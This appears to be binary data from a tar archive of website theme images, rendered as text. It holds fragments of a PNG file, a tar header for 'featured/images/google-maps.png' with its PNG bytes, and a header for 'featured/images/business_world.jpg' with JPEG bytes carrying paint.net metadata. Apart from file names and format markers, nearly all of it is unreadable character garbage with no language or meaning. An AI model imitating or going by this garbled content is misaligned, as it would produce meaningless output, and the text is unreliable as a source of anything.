�e�Qg�%PU�^c����w��n��G��dQ)�pI�R^W�����:���i1܅�-��5��i�x��-�<Kl�̗۳�(��qF�8��z��FX�y(p���K;��MZ�`y���xP9��"?�b���}v��|�	Z{��N"ej�����Ǘ�7�JB�2�R(��"���Q(�"�d�I�ds����)cQ4�j�͓�Ө��~�=H6��6<�\��k�4��;�]�;����T���s+�`�
���
w�@�����n.�t�>��@cy����;Z��D?y��s!�S������=�����s!��3�-�8�'�o�X�#�
<tQ����`�nA[�KH���,�/���X%��"�Ppi�*ߠ�/2\
T��'xĕR^k�>sk��M��R5�(�+��n(.ȥ�n��b�dR��p����5�
�g.��h8J�C���A�Ӎ�Y��}x�TLoX��9�	��$�*J�Czkh����c�W��N�Z&
l8`�ߔ�ݖ�2z��n�E]6@1��cM�Q�������z�@��i��\�-Hr[aM����m"uF,Ÿlq
.�s�h�Mm�j�)�9�QZ/X��8��r`��XFü�9�3S�� ��h��0|�)YJ5}
u��b��a4>C ���+[&�ןWA�ԗ��0��n�d�"�7_Q��Gi�ѸB-1A�P��иR��5�;Dy�.�YQ@7V��&��`T�bD�BQ
 n�fɘL�a�.�5� /��Y�D_]�5K�UqY�\2�V�y�M�艅��������!��bNO��=A#P���6��n^�Cc}g|�%f;�(�x�:D�"��'~#�8�@@Ê�(���l~�v���k��\0�F9�~nh���B*�j��Ms�T�2
����V)�s���#]4{x}aTF�q�(2*c�ﯙS)Mf����qc�K�܅�`D!}wBi�,��Y=����V��Ϩ4Y����m-�o;(�)���[j!ҙi�������}����@ܿ����~Xz�4I�As_�t�四�w�&��u��F�^S�R@��>h�z�|\�s�T[~5��b0@��{�w󪤲�~<U��q��ӮkD�+-=�`S#�ب=/�Ήet��
3
�T�ޓ��ː�_eI��FL�o�P&��L<D�Ph���vm18J�k_���A�G�՗�\4���#�t`�n�F�]Z%Mj��J�lt�88Y�6�������S$��d?�hp0�R��}\
*�dɸں�VZ_¨t�	^oG����Ə�
Ek�n�v��x`Z�^�d{�M?�m��y����?m���~6c��^��P���d�qE������O�=����L�]D�����l(_A0��[��?h��'�1�[x��ԕ�d;�xy��$���Rd<�G��ڲ�enI,�Q#P��B�X�%�E^��GJc,����}��������%�A0������؏؀׽�x�A��.����	�2PO���q`2�!;/�ˈ%xY��7|fx�����y42��5��OKw����'�	��k	��(Lc���L�R�”®�Ƀ�T�&^�S�R�ƅ�����J���p<p6�&��jk���.�*G�F�
�x�\�-��*P0�n;��1[;��O���10�i�Rc�Q�<�ϩ~�9���k��ޟ����


�j�E�ј1cl�B�R�6�}t�
n(�!r췯�,J���Q���ۺ�7�Tǫ�	�U��'��`(�G�v�
�v��๠j=��A�ԧ����&�-\���q�k�9���J	K';��}*Pl�
�@ܩR�.���X�3�El��]j(��H�:��)("I̢��hx+�ͼ�L"�'�j��@�@��=S���S�VnKIN�YЃ������%��%��î���� T,EHnO�P�Z�Ɇ��4��d[�|Q�=]xᅒ�]�HO�MI֦H�^�b�����w�u����#
�B@��u�6�s�
�o�Kʢ�!
t�+ΙP$p��_����Mr�2�jK���A6EZ���3+���uN�+�@p-D�u�K)���,k��Bk
*�{ޫ���n�	�-T�(��#�9�R�CH��M
��<�!\�J���P�}�2��.�)q��W�X	%	\�0�w�.7���H�'�� �PZ	E�s=�P�<e��\a�払��F���i�i�^�b��H�g%x�(+��iP�l_��Ui�1��4*V���ۛ���.��>�`�����0���4Q��Ld Bg-��LA�xK��ո]��a%xc�M�B��w_��=kgJ�s._�])�%�-!%�+���b�VZ�28��
*Vb%���MĨ��n�{9�0uoR-_���L��x���ɗ��B�9�>D�R�
%q�y�6�����C�G�#i���je4��Bd@�,#�݋���u~�̼`�Ϋ�N��.�= ����}����&t�[��$��A�-ռ!惖K�B�m�1�*�%�ǝV��d��u/L�CQ�6�QR�:�
(���B��@��?�~b�4���=��n S�^<̽bdP
]򊶜i�Xʋ�u��=㱚��
�
<B	��	M���z��S�>+E��z�"#�#��

��!~E���7�ۑ�y���-sBw��)�#:��%àG��HC����'�s�����b,r���L��'�j��
�Ŕ�-Ka&,ec;���al%4�O.e�F=i��}萓��_�uE�N��Q �$@�B^צ���T�|���	vb}Ae��SC�j�C�����T���F0��2�^>p�V�=]��Ӹ�R���Bg���\tJ!`а,���7��%MU�E��JCl��� �4��%4��'��V�.����	�◻��>��%��;�"���0�a!1���-�i�?��sٝ(�E<��܆��'���������[����*�ɹ�…�Pvk��b��_��0}�Dw񪹹ي�3`�
`�jй`5⭃��N��w=��|�mP455Yu�F�5Ѕ�R����rA2a�*�I�6���Ҙ�c�[������r�g��0(�H2iG�A�#���r
����u�j(�P���A�U(aPN�SY��-�~�b��X*Y�"�*@�8�k�Ư*��p(�<��""*��o���d��;���9��q1���D�pd �k_�s:����`��>�֏�Mr
Ś
hw�퀀���e(⭇Ր��(�$�@��z��m���g(Ke�B�h�;��A��Jˑ�z(Q����(��Ai���	�X5_)��ÿB���P�[�����Za)��
 J8�7sU!JR���Ŗ�؆}��x��Ao�~
9^]�`Ђ#��H����p(7WIBT�7�k�L1�U(�F����mx�*^'��!ޕ��2�_c��x�}	�<t_6����=�O���86���]F��B�5٥P���(y�����P(�w���.����d�����Ql[�6�!9���.���*Ӡ�u�Z(��{J��<|�H~e��#��˙�1h#�FM�:CR����
G�Mq�pā�
G(q�p���W����IEND�B`�featured/images/google-maps.png000060400000023765152434416630012551 0ustar00�PNG


IHDR��u�;<gAMA���a cHRMz&�����u0�`:�p��Q<bKGD�C�	pHYs��~�'YIDATx��wx\յ��NѨ��eɖ�4��ݦ��!`J�Lh!JB�~�`BIH.�!�\���P̥%�jL� ٲdɖ�:��)��c4�H�fFu�<���xή�Y{��Z&0�	L`��&0�	L`��L7`4!����l`&P	T%@A�G���@����OP�����[dYv2ݿ���B�B`9pp 0�BUA�]�5!�:!�:EQ�3����B��J�X`) g���M��q֪��v��e8�\�BQ
��AlYWB|�8��m���rm�t{��B�B�3��	!�9��8�eY��qF0T3=��b�K
!���0%��bpg�eY�i��o����2ݦd��Bx�ˀk��>�B ����˲~�F����t��ø#E�6r5�C`R��3
��q,�j4M��0�-,,W��qE
!��/�%�n�h�ql��4ͷ����-�m�c\��[o����l)3�ol�Ʋ,�0�_�q}III����Bq0���L�%C��/'D���H$r^qq�K�lS�H!�P���J&a< �v$�-��TQQae�-!��xX����+�zF4%���DN///�5��sR!�;��@!��H$R��\QQ��X�aL�:!ĉ��Lb@H����躎��p��/��՝8�m3R!.%&!�c��#���x�n���m۶]:V��	)���bB�L�$�(J\b(n��W[�n�n,�uR!nn��|� �r"1p�\�����0����)����hw��q0M�H$B8&�\3mڴ��V}�&)�w�V��N��.��˅�iwn޼��Q�o4
B
<A�q#��I<�
���V4]9s�̧G��'�b.�
�=�58�D�y��G�anل�ފ	9'�_�V5}�"\��ts{l�e$w������ꃑ�gDI!���f��X
v���=@����`ZϨS�u<Y'�J�6Qq���D"�-�e-���n�:F�B	X����J���B�_����!=�L*'��+p-90#���A8&
�F��m{e #Q�H��ƳbiY���{o�>"��X���2ҕ�e$
�D0M�ڪ���D�#B
!��5�5��!������Ήh���.�ںe��+��"I=O	�#p�/���ɹ�;���c׽��B!B��aDm�޿�����=�B�;Ģ��%Z���fC���w�a�°�(��GUq�
�#0��=�|�߹�y���0�����qc8e�Ė�z�1!:~��{B�,�H2����!��tD���%	]��t
=n�t
�v���&u=x������i��fpM��u�4�,k��:��*{8!f����H��j7��ս�芌#�����P!@SddIڳ��-bBWd&�|�fy��1�\���8��R��Ң[�:��0lj�õh��8%@�/{[�cB�q�v���B�<���@�"�2^U�m�uv��r��NG;���HeYFUU4MCUUdY�%I����ݾ�fd$ҀU��{wV��%�m�È��T$)F$���Rq�L>�l�gύ�Pd��P��Ec0��(�U?�ޗ�~&.#qbH�����攡�9$�B�2���@��'��Υ�4C��#x�=]/ZqӾq%���hmo���;o&��Y�p)2
�]d�U�|:�1�g�4UӴ�n���������<�*)��Ǽ����Λ�;*IDm��P���/9v%�o�k/B�-ޟ%��
�������84��n���2��(-TUE���s�RޠI�-%n�H�ӄӶ����w�,��6-��m�^X̬oK>@��9��,�w@�e:�&��K��>��X����(ȲpcMM�6貆P�IJÌ[؍
���$��f��a�W�L�<_�>��]�,ɘ�MIJ��ޤ�w6f��qi��j\�D��i��kP
)��X�ӄ�Ѿ�w0m��#>�� �@l�i;���>;z'D�33,IR�N$��H1Iv�`�)�+��`�i�{���\�[��_��d.VX��b$,!jjjT9������`:��w�+��3q2�[?K�̮��12����1$݅�d�߉KH���bP�6)�~��xP�J��ޥ*�$Ŏ��U�cFiY�b|Pe����RA�d��z#�'����[�`$�Y�4SP&MF���q����`w����ߡ驵)���p" �Kx5��b;�e�Z�yߢ��GR����+c���t�}��^�������]D�=
�'7_O��XΧ?��]�=��#�7�����_��n�W����i��!ʁ�|�rGo�N���*�؎�'-�DmW��:�e�8��*���'#����iQ�0=?Ӷ{�B�)��'��Y��:�m�D��B!L�D!�)�@`{���5s�����#��	�6��0-/��-�	�h}c=�o����e��kL�����o�����!`�4q	�v�<�X���Hw�ǵ��@(<�ly��'�m��ҩ.�GWB���Ļ�t–E��E�?U�0g/�;g��0�8)�i��ue:ϧ$��
����0�0	pL҆e���
���B�$���a�v�Dz��.Eajn6U�<Eư�'����tw{�}oeࠚ�w�gS���2�ng8���+��3���
dܷB�%B�EW4�a�=RC�e<�J���R��x]�~��{,���q�ޮ�.��p���@ �r�g��)�e��q|���+
@���+bqt��\=�D�ק�ܻ���e㖡���3�x����~���("f픈mS-'�U�eHpH�nD�o"֞g�e��p;�e�fzX��$I=ˈ��n�'���!���N�i���E^��u�#�^j
�h:(���_�sQ�R~��%��C��ێ��Nݐ��%��p��;�Y����qB�?ݒ� �dϥC��o�����3
����-P%����lF���k6*�f��l6/G�ѷ_@{�L$�>�C~��]�\���+qm�a��k	yr�?-0'��$�)=���ݦ�Lt��NvF,��t�.N}a/7�B��?t
ֶ��֎��3=�?\��j/>��m���� ��09�̦o�a��p�マ�Ձ���K��%d�;���^��Η&g�,qc!DO0r0�0�=��@`�@Ϧ��Ʋ#�yk^U���`KW�MQVU�r��"���4����2�,1+��#���}�0���X����_���G \�H>�Α$
�m�Z6���8��;��y�`6��N��Ո��_�!�CA1ź��u���u3ߟ�3���=�jK:fwi��;?jf�{;y����%�%p)�>��"��mAC���)9ܲ��,(�LU�����1IO�U���es���C���:��h��Z�+_�UW<���:�O^���x��b�� �n.��jۇT�p��O�A�C�T��r���������M�滙�����K���6y�9ğ�࡭�<����"�l�IX,||�
����W�٫��ә�����˼|7�F���{s�X^�ô��bo�t�h��!
�@kK2�;y�|!O�{�>�`�t�Y�������h�W�5�W�в��Y�3�Mﺘ����}
)r����*G���#��!��#鼦"���6��m�]�y�1�$�5ٚL�� �(�"[S8vr6�!���(�Exowl�����,����+�Y˳GO�ܫQ�Q�5�V���s;E�D
�s����Ï���'iײҖn��䚅� ��uyS8���՟��s�j�Cm�^��x9���B��q����Onk���feE7/,�Ħ��3)ʆ[������J{�����!�W�1�	o�!%Y,/��˚��q���m���쌹����W���澓X^���o6��\=��/��G�{O]}��>»ca͍,���$Sڶ�G��꣠iw�{
mY���-T�w�C�[�O3��@�δ����Fx���玙�.�5�)��k*:��W�.�)˦�L�M-d9�	����q|y6��u�ak�*�zf>G����i�X�ڹ3r�E%�]���:ο�2��*���x�U+��mغ�����#�cJ
}S9���Ǖ�ω9�Z��&s�S���W��v�rՂ3���\��y3�F��ڮ(Έd��C�~��t^S�"mo��p��;x���ZO��Sȟ���Y���Ű�zN!W�S�3x'U��W�[�������t�7�Pl��N+.B��_ɭw�������S����;�~!$����9g%[�,��F�Uho��_��i��nݎ����Lsټ��HR�.KU�C�$J<*W�.��9��5=�<]!d���gRR�Z>��7d;l��e���B^��]�=�����o�jL��+���1�[�p�"
4����T��ͥZCaZCQ+�G�";'�����׳+8uŕ4��<�IT�{��HE�V�+Y�p��b�B��2@Ѹbɹl��ܾ�t�=��:��G�vP��x���i>��_�A�K%�vF,�.e��nf��t�5��t I_����ܺ���߹�š%�|�t)I�p޺�\������'���[#��N����(��t��T��ͅ3h��bsk;A�A�ˣ�e';��)�)�~ʤ��qٹ��w�+-Z��k�"\0B��D�K2����)Ky|��l��pr� ܾW�^��|�/.�j?�w�ق"�����KA������ѿ��4(<�Esث[�as�+���d�;����P�՘��h
[L����Z\��
]���ay��u�%l�/?��u��6L6�n�t�~̹�(y~���z���e���2Jv�r��?�ْyt�s
��өy{�Z�$3�co��f�W�I3�{Ȅ݃l�c�֯.!nE&G��?m�$q�?k)v�ܻ���-p+#��'L���"�`Y{��pԽ�Ny~+��aY9�n�+�h�%�}r��n�ڽ1+ׅa�cQg�f���iȚʜ���_�$I�~�r^<�:�[1��W���ඹ'��lD$�����[��Wvl���$��p4/Bu����Ma��ߋ�J�^ɚ�%l��1)#��톉�t��þ������S	Z��ض�ȽG�)�-��-KQe�{6Ŷ��#�Ý by�dUE���*A�
,YA81��cG!�Ϡ�?���nI–�
<P}$뫎����GI3V4�r	1;Ly�FԉYk˽>UF�-h"�"�2��C�+��9yn]����֫Vcp&�W�.�̫�?�TpXIa[����/Bܪ����=9#�#K��/Z��u
��9�x� f�T�Ytj�U@n���;���
�{���b/�g�s�V�t�(yzL�- !���J������6̣�^��2R���8��Y�X��
�|:��@��P�ZK��C[���J�Ӎ(S��G�����R >?
���&ڵ����[�e�Ə��0k����|�M)��7bʼ�^��`���n�te��8��q��K�aI�fFf���a~1+J�h6,�t��N��uiξo4�*KL�ˡ��f����緲��w(,*����۶���=�˗r�$���l�X|R���yܲ�t���>Td�T��*~��Ǝ(�"%5i*Ƒ@")��I�!RI�Q���h���M�i\X�'d9��_S����8�
���G4EaF~.����p�
nM�� ����x���y�Y��+�
�Q����N�Q���S��!K	�)�OY�3
����v�����B�VF?b"N�~��e
������ֿ������ K�	�Y��v�uJNn��v�jynM�yb{:��/�Q��yq+�vy�9L�a2�'q�Wq��+��!1�jH���i7�~n1�a�{��s��I4�-�#e�)$E�yM%)��jˁB���|<U���0K�9b�Y���Iu���,�N�![Mm�˹�j���b�ɒ`3����1�4��ts'O7$l��zp瀮�ĭi,.��fs�����ԭT>ud%�Qr5uE�Db�&{>U�j\3�o�(--����Sy䰩<phL�<U߉.K��P���wFU��T!P�N�^tv^y�d�W��e�0@Rz��.*}��N/ՄG$b��lM���tIQ���T��<�-���|||r5GN��N��&b���ESآ�t8�:�ٴ;�2�����H��`K2�;xy�<<���1��P�Q)N����+�{�#�xI)�}%���{�]�I«�|#P��E�^Rf$��B���I�5)��tcJ��3c��?l�M����v(�rbE6ӳu��u���M�c�**��Ә��D�m�$��%�����6���Td�9�)�j��sS��x���^Ʀ[��ұ{R�I@�O�e���e�mk;�ۘ>�GqR$�I�5))$I�
ԏUgΚ���N�I>�M��L��ngN���f��&shI�+Ŗ����s/����O�ìcyo�!I��������1էqq����֣�]
�L���l��[Ģ�o^qlB����s�{HI!��9�m$J	۶��'�yrCzgo�Io�qze.OY�['̤ҧ���i��7�f�+۩�>�O�&��`Ѥ<�9�z��[t����_^h�=d� �éSs��q4��̍�cXU��\o^X�e�
�Re¶�����iy��3ȅ�Sf18��eY=���I�|:�1�V`q��
'Wq�zf=��`�I��MA&yT�xPG����Xx�I���ɮ�2�ڙ�ݡ.h���d���Qe>��*�UcN���L��NN����J=*�T�9�4�2�F�v�e���R2i
[{�Q��L�,/�*#�Z��oFE�/W�ޖ�a�c���Z�4�@�Wc幫(���xUN���B��+y�#`v^윥-j�W?|h�.�U@C�D��Nnx����pbE;#�~�s;���昲�;�扞{@,��)�3I�&1[y��(�� ����9�лi�✩^N,�#d2#GG�$��lm/�H_H����X �-�^�/ˊ��Em,!�'�����fsg�yk7�~���J�F�<X�ηfP���9	1���ϤH))$I���Ta�am�ၗ���uۻ��v���d�����]�����qHI�a�lM�*OW��,��r���$OW���B�$�����[��������?f���)%�P_:����@$U9�漺�4��{fK��2L�j|pR�i�m����o�ֿ�wF���'�DW$���a-�m��L�h�U�zpT�E�$V����6�2٫�	3��O�������9)�f ��F�K%�KsR�C&mQ;�e{eE΀o�˃�Q�A`Ue.'V�+b1���В,+�B�$$	���r�߼b��y�)8b*F|+jY�@��M���z,I�v2�p~onqZ��b�*}zZ>��^������M�t�?mn����>uj.�./gQ��y��pݿY�����`I���8���|��I�T��4́��W�Ɍ���|p�>$,/�r�>��ʼ�ݷ(�^��݆����J�x�������>8�;Tz�w)t�'?W��⭖0�Zϕo��M�����<lߊ���ƶ����=�!�_H��5���~e�==o����d&y4AZM;�f����n�{�����v�"ϐ��wwG�z�����|���xZ]�K�.'E?K��O��M�n����j�0?0�'T� �i
�\�U���|dk2��
Q�R��Ն���+�Y;�4���+�x(H�	WE����@ �+�2{���a�bh� �E%�hq);#vڷ@*�ę���j?���g��}	1��v�
V�[nz/� 䁐�K$1X�f0e��$=�;�e޽�tY⢪�DziP��'�_���a�Yt�6�./����$ޗ��~�0�a'J�h4:��x7<7�r�r��O�ލ���~v?XPB�[�5j�;Hw�%�_���ܵ�����4�ԣ
�K*ގ\]����4'U��≆���1���k�e��m[�e�2p����6�a���U����I4�!���`c��E�~dI"l9����fs���8���}��[yt[�:;է��I����Jx�f��ȿ��W���<1��8���ssq<�YR|���WmNS�tg�$I֨
��\=�8���7��h�4d��*r�"�Eu�����z0l���E�[�o+�r�߷�l���h�D�v�t_��
-���h2�-t=�K�h4�JJ�,!`�����E�q�#7HĻ<է���gi4���p���]
y����`���_3uq��E~ˊ��6�j�W���jZ���*�]
A��ר�\Ɨ�DR�&��Ci�H���%��ވ�^��X��.K��H�#H0lb
��{�O����{��.E��vr��-<ud%��X��O��]��g}u�~p�Pn/�aD�+������1��,7Nu�Ψ�)v���@���x��,.�+b���씸l�A4�O�x!<2�6�ζ�+E9\�$}8夋��i��n���OMdk{���Jc���p,RKB�41�0ڂF�ˆӶa��h����8��@n��pa��B��_k۱�`�߃[���Ok��ԣ�k�O<M$����@`�p�1l��DtM�ޑey�X\����,�b�/f|����L"�XF"��pOV�~t�
��@ 0�3�I�0����,�c���X�hʨ��!z��P(D$�4��n�#��r�޵m�g�t.v����+��H$�p�HF0�U4�Ӷ�'�J���#��4�H$�k��g��~<Ru����Օ��۪�N���k�X n���I�����@���#��ڢ��ɖeuNH��ò��%#!:��F�0
)}>��h�4˲���1�(��iHX>�6�J����a�Z�%&��>�!���28���1Х�@��hǨ�S��ξ�0��Ľ�'���m�p8�C�$�;�@��j˨k�mmm7�\�5���(

hoĝn�˅a�x�n7�f��d�v��}���S�4)~��;�!~qKe��+n�J"!Fl�9��mnn���rݭi���j�e�[ �#�p+�\@�X�߯Ǣ�c:+MMM'�\���uݛ���;�#�Q&�x��$�b��g��c��1�����%.��a]�+4M��Aj���Hb��|9�L0���L�������+t]'.5�h�HLH��O�29!^NL�H!c3P[[�h��}]ׯ�u]QU�C��dH$D�����7
՝n���oݺ�`M���4�2.5�|.��Ȑ�7@ܞ��2�$�)�l��SU�UU/�4M�4
M�P�����HLyl�v���8��I����þxg�W��e˖�E���iKTU%��&�c<�o��8c:wI�
���+����P�+RlڴI�e�k���QUuR|9�dY�Kz�6I��ŕ��0.	?���$dhn�
��hܑ"�M�6yeY�L��kE)�K�D�џ�H$H"Q��&q����K�D����.�I�5?��;�_�����[Rıq�F�$I�Ȳ|�,�S⒢?b�C�Dr��u "�G�D�A�m��oƃސ�q��Ԩ�$}E���eY>L�$�?2$#GҢ���Nv_r$^�������C��b�R$����Z��s�U�$U�'<�.%�,}'?�5�}�)p?�@ 0�1��������Y�'I�R@N�d����Ŀ)��d�4�x �$�#��=)QSSS,����]���x
XG,����8V�B��/jjjdb�U�3�J`
P��b�Y�- ����N�	�#�5���2޶���&0�	L`��&���?�x7���IEND�B`�featured/images/business_world.jpg000060400000137613152434416630013373 0ustar00���JFIF``��fExifMM*>F(1N``paint.net 4.0.9��C��C��,�"��	
���}!1AQa"q2���#B��R��$3br�	
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz������������������������������������������������������������������������	
���w!1AQaq"2�B����	#3R�br�
$4�%�&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz�����������������������������������������������������������������������?��(��(��F8V>������1����_�'��H�#�4�B���5��9�9"��ewF��"6Q�W��
���_���΢>~�z����mxq5���3�uq�x^y!�0���$6l�R���1���3��{=���a��7K����N5�y��)j��\a=S�D��cꏀ_�P��������W>9��=MR��?�
q��_X�{-���guv2@ 1	�~��u�|!�4/���O���7·�����e�7�w�O��F�x�A���n����׀�c�J~�����F��o���u6��
ҧ�v�d�f�Ô
�A,�R��_��!|��;�_~�~$���E�-�n՚�WR�?�̗X�����F:�ٞi��*_Wi�}m}y��'/���L�C㚕l;^�2�Q��ݩ��QW��K�#�I���~�z���K�}L�?�"��]�<��ۚۅ���r���\0\6��q�;�����%���/��<Bd�sy�H|I�.�����K	�e�=�4g��9�s�?�7�ֿ�io��>
�j�~���'۟�g��/yyq�/�!�z=�{o-�k��vIʳ6ď�{�n�����_�|�,<]�J�7���w#�[B:^�$���2����
�2Ss� )��\G��k��k��w��g�s��^�]_%S�ǛݽXKK��e��^�q��<֒�����7�e���y}�|T����cQ�|m�y>��z���YGz�Q�$�X�q���9�I��|7s�I��S�񍿏-�4>\���Rj�`�-<ͥ^4v
����`ϯ�^�E�o�x�������-��E�5�����4_�[Ⱥ���0��n񲹑��������u��F�S����
�KO�����4�xWOkvc�����M��8HI<��]�<�7�N�e�߶�=u�+���[��yjZ3���`��8A�	�y��W�����)Bq?r~	�e�G�χz����w���e�u&����)sC4M�Ȍ��<H ׬�����0x��o��|r�ot�+�7��h�����N�kuqk�b�XB3)��`g��}���8T��I�oá���}���XZV�RqV�:��J�J<޼���QE�xAEPEPEPP�<0�"F6�%�S�T��?>/�	�W�F��p|%�M1nt��j�F�;�7�gq��>0H�@j{�`�Ў)k���~ ^kQjZ��� �>�t}+YԬc���v���5����͖0�"ܗ��`����'�~�:����1�������,z��PF-Un�c�A��<�Rrۘ�a]�cߤ�"F�WX�E%ݎrI�����!K�I⹂O�4VǡS�+�e��4��e�)P2���<s���6߲�4�h4�+�w��mO�u���h2i�v�E�}�O[·?i��]�I ��ϱf���!�h�"�\.�'��ҤW
�v<���~��+�%�Ɲj�x�k��w%ޣ%��6�Z���y�g�TV���|�)t��w�>�+�?hOﺆ�?��qڮ�K���y�����?��99fWw�cʈȮ�ZC�z�n�ey��>���SP�ҭ���E>�2F���,�n`[���=k������h��-���m-Q!�nt��1���H���=�:�$�v�9Z�����pݷ�+�]��(��t�S㏊f����t=Jk������;��K�x��IJ���VY�6߳��u֭5�ύz�ޣc%�V�mw�>�_&D�qIV��Ih��'n��6�m�������E����i���ݎ��\qV�>,|��_���j���z;M"K\�X�%��y�B$�öIA$j%C�v6�(��
ǀ4n��|{�4x�Y�n�]g㇌n���X\�
��r�,�q���a}���|���Y��Fă^��?ě�i�׮iW
S�څ��i-���m�#j3�,Xe �j���ZB�����.U��T�FFx�pܬU�>��v"����/ٟ��{՟�?�Z&�sx��K����k_ʌ�v�K���-$�����U>�@U@=E5{��[��hՆܩo\��4��w�%����6hc
̪@bp7.Om�־k��:I�[���x2�N҄rɧ�t��A6�:���_��;�Y<�~��,<�7�x��i������x?�^�wqo��V~��]�����Xȶ�X��p��{>bT����\��'�:�s�O$P����W�߳/ą�mf���o�A�Imo.�h�"����D�r�������č��~��,cԴ�:v�C{j���Hc}��X�T�ҭ	�b���O��]\�u���ʽm'Q��C'�c��kn�C���]�Ũ_k�״?�D�tx���K��'v�%VGI��i�D��|�PYk��Zѧ	����
R�JW�YQYEP��~���+x/N����9�"�a��59q�����B�R�s�ɮ��i��!�ɯ_�{[�Z۟pG�Oj�c>�Pz��7��u���H��3d3����u����:���?��
����qA�<+��[�U���*7��c:Ti�
��?u�D?���.��G���������z�ԋ��ׄx�Bjri���� '��r0>��d!�8ԺT\n��j��}��N�i��m��ք瓮�h9�'����s��N+r$���*}�%�^ޯsۣ��;�%����'��Wc�����v��W�[ȸ��:��9a�<t����?oW��C�6?�[��O�U�񌏜i�`���:��Q�z��ʏaG��ظ֨��G�H$����X$��ˬ_4��q�x��W�?y}y\R�T��Mu:��	s��!�T�Z���s�	+�F@~�aXc�����Y�%��M��]]ٔW��5L���R��B��FNrrx5e%�sԊ�X��F��&�E'?wu8�0Uc�F�ȍ�����J�a��T#���X�4��:���!��d���ύ�v�y���zׂ�u��V���v��l..�"����b���{Wo� �9����c�j�Ə�;ic�	Ws�%B=I�kl;�N�eR<�M6���rrq?�#��[>!x���>xj���f����5�F����4�?g���+�S�m_�s�7]�lV&u�����o��w;�����_�^>���]H�>�G����̯��>Ͳ�x�8d�%����8��8��q���ן�p��ke%fO>��o��u��Z��8��Bc?������s�ȵ��Y�R��&�k���s���*xi�k�a��?�H�}�?�y�/�?�����$��`�I>�.G���g����$����>n�.����S�Q\Zΐ	Lgc��|�_�
�/����i�F��36���/�?�Q��H��]�H9��&��j6����$�_�s�?�rn�����-��_.5g>�TwV�2�b�|5��=0���$�3(/�~�����_7(o�o��7B>%��-N��q��w}��]�@ ���u�ȵ��2��1���Z�Ӡ�����޻a�6��W�?�H��^~����G���>$�,�̾�1��b\�}�޾��S������d��m>9���Ąg��W����Dk˻b�����o�S������!+6�{bVO�hy�B?�P�S�|;��)�e^�%����_�gX�G/�����|!����A���<C��OJi?�,m/Zo2%;CTc.`z�ѩ���8~��NҬt];I�
��Z�6���b@~�3�SZ6p���S���NT��ݗe��AT�Rn�����C��[�G�I<
�Q����
�ɜ���kT���|A ������7r@n<�DL�[����\�*��s��.�y�{.h�!M�i�Sp�,�?�ګ?�����q�
�+���aTd@�I'�R+ogM�U.tRx��:���$��Q���{��-۞?қ���Ze
��f�.�P9���MS���U������R�=��&�,:v�MeK�?��Z�ܝA����60Ǡ�9�xj=�>����z4��b���3���/����_�%|3f����^{i��J�-�m�iʱ�s^�ៅ�i���;��
�?�S��/�O�D�t4��N[�jxO�/�T�$~���A��s|�}�
�1�=Mz��Im,�*���<������Gk�1�/���9��Rͦ�D��|�W#�,z���ְ��:��?%�n1��n�06�6�ߝb[�Ѱ{
۶��ʑ�Z�O�C���R�9<���OԦ�����9�*�&V)!���k���ms���
�hec����e��>������tb+��<�������
ekGމ����Gj޷�>�GS\l�v2;V���z�J̤�:�&|���ނ]��v5�E60A�<���#>¤gg�����~)p��)�3���Zq]�<��(.2��E.vg@���� c�{�/�=�N^���ȥ��c8�"I�lՅq��>���v���v;j���Q�N7-I$m	���R���Z��A��`
L�(�H�5�F��ٰ�c��N%
�;X�>^�2jt�zw�A�Q���c#��U��D��X4u��MU�I9Ǡ���\撸�|��^|3�����x�E}OB�h5�}�����BH�v5��|}�G�>��������gw���"��4�K�m���O��˷���������~��
{S���嶝��q�����?�g�#�Ax5�m���}:���N#�s��y��x��c��pO~ݿ�yf�Gnb��½�ǖ"���P�͕+�zW�j�r�k�Y��h6ّ�1]��!�(�S4!��瑚�f��\��>3��.~|>����?�i�[x4���$}ڕ�p%����$���?�pTɴ�Rk<�nP%�����د3�0ٕZu*9'M�ZN?z[����M8�k�_�;��y��Z׿h�v��;�,:-���t��a~�]˕���;��g|a�%���0�
���_G���󮑘��_�`�#�F�y$���5�𖅪�Z�+�x�N�L�k�U�/.��ܰ��Y�l�)9�G'����b��c���
�`�}y9s�Z�����L\�g���k#���=2k��"���:u�;��f�
�����ֽ?‘5��DFCʼ�:��<}�s˩#�_��ϭk�d[8i=;��U\߰���O	xJ��v���Ǥ��`=��ϳ
�~?`���x�_ҚY...�#Kh���G`'��?
���1��S@�|3`m�;(ѤU�Y62�}�c�����G*h`)�g���Ϸ�l��C��l;]�J�uc֜�F>bNy�D�q���Uw��y=�4�[J�$^B�>��J�YD�ƅ�⪫�eD]�ǑQ��;)vA
�����y23|ŗ�S ���R)7�S�c�*��Î���#�B�����ڲ�$���ǰfi�/\�ۅc\J��L���Ԓ�ě�v�XҮN8��5��؜c��=��u{ ����
ٴ�9%)�sF٘�?7κ������/�l���>X�;ף���Q>��<�ȋ�_�mg]��md��1 ���8���V2�wdtS�ˬ�ml4�Z촅cf����>:W�_��	�@8�G��W��@A#�@��+��r��=��B��;�9ڸV��I��"�6	s�jf�n[[H�%:��<�:c�������)���}�b2ΐ��k|7��'q��3�<�_7���*�%ܹe�'�&Ve�9gU2�8�L�pH�(����3�[W[h�|�nd����²�F����OS�+˵O*���7s�3(�I�cv',pN�g���Cg��Z�W�8�S�]V��Cuo%幞�7_:#��Q��x4��[p;�'�jE���H�����i�G��7�uMCa�k:6����6�>d~gmۏ+^R����PA��Zؐ���xP*���I�*!�9N�ا�r[<� J�����*�&м�>�7v8�#R)���$քW@(�����'�{�jCr�$H�V���N�m�2_D��+�h��ܿZ�u]W��&��A�Ga�o|�y�Ҽ _�k��ja�"��法;���OS�R^����V�:�vN	�
^F�Ҩ���X]y`9�*���=�-Hs���cW�R}�`�׍ů/_0g�kJ-t|��q�4�������!��P���5�k�r|�Z�C����;z�K��0<�Ǩ���5�k�U{�t�Ǯ��g���M�S�g�&�%�t�)~I��ח&�8�뚙u��	=8���S�h#�>��z��ぜW�
m|�zT�۱����&����C�t��XX�xe꧱C�_��
�?ï�H��$�<2�k� L�[�6I�b��#zW��]\�#��cj����S�~�6���5���֎A�1�n#?�g�z�.k��3ZX�_�WU�F5�GE�]O���΁6��jv���˕������Ljo
M.p6�ۏ���(�·�/�5�B���	�_~22���)S�ҿ�k�k�а���=��u����a�<<E'xM&��1te��J��u������k�|��u���Z�������l,�$��0�/n�y��x~ޭ���/ό&�7C_�ך��'^��x�n��F��x�����=+�0�LD"�U��=-����]I�5M���������?o|_o�����aѭ"o
